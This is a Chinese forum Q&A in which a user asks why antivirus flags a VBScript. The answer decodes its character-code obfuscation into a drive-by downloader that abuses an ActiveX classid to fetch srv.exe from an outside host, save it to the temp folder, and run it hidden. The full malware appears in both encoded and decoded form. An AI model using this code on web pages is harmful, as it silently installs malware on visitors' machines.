日期:2014-05-16  浏览次数:20562 次

关于一段卡巴斯基报告为木马病毒的VBScript
<script language="VBScript">
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
t="111,110,32,101,114,114,111,114,32,114,101,115,117,109,101,32,110,101,120,116,13,10,100,108,32,61,32,34,104,116,116,112,58,47,47,119,119,119,46,115,116,116,114,105,46,99,111,109,46,99,110,47,104,116,109,108,47,83,84,84,82,73,47,105,109,97,103,101,115,47,115,114,118,46,101,120,101,34,13,10,83,101,116,32,100,102,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,13,10,100,102,46,115,101,116,65,116,116,114,105,98,117,116,101,32,34,99,108,97,115,115,105,100,34,44,32,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,13,10,115,116,114,61,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,13,10,83,101,116,32,120,32,61,32,100,102,46,67,114,101,97,116,101,79,98,106,101,99,116,40,115,116,114,44,34,34,41,13,10,115,116,114,53,61,34,65,100,111,100,98,46,83,116,114,101,97,109,34,13,10,115,101,116,32,83,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,115,116,114,53,44,34,34,41,13,10,83,46,116,121,112,101,32,61,32,49,13,10,115,116,114,54,61,34,71,69,84,34,13,10,120,46,79,112,101,110,32,115,116,114,54,44,32,100,108,44,32,70,97,108,115,101,13,10,120,46,83,101,110,100,13,10,102,110,97,109,101,49,61,34,122,106,49,50,52,52,46,99,111,109,34,13,10,115,101,116,32,70,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,34,41,13,10,115,101,116,32,116,109,112,32,61,32,70,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,32,13,10,102,110,97,109,101,49,61,32,70,46,66,117,105,108,100,80,97,116,104,40,116,109,112,44,102,110,97,109,101,49,41,13,10,83,46,111,112,101,110,13,10,83,46,119,114,105,116,101,32,120,46,114,101,115,112,111,110,115,101,66,111,100,121,13,10,83,46,115,97,118,101,116,111,102,105,108,101,32,102,110,97,109,101,49,44,50,13,10,83,46,99,108,111,115,101,13,10,115,101,116,32,81,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,13,10,81,46,83,104,101,108,108,69,120,101,99,117,116,101,32,102,110,97,109,101,49,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48"
i=t
execute(rechange(I))
</script>



就只将 上段代码放写在一个 后缀为 .htm 的文件中 杀毒软件会提示是木马病毒.. 

想问问 各位. 为什么.. 本人对 vbscript 不熟悉

------解决方案--------------------
on error resume next dl = "http://www.sttri.com.cn/html/STTRI/images/srv.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") str5="Adodb.Stream" set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="zj1244.com" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 

运行结果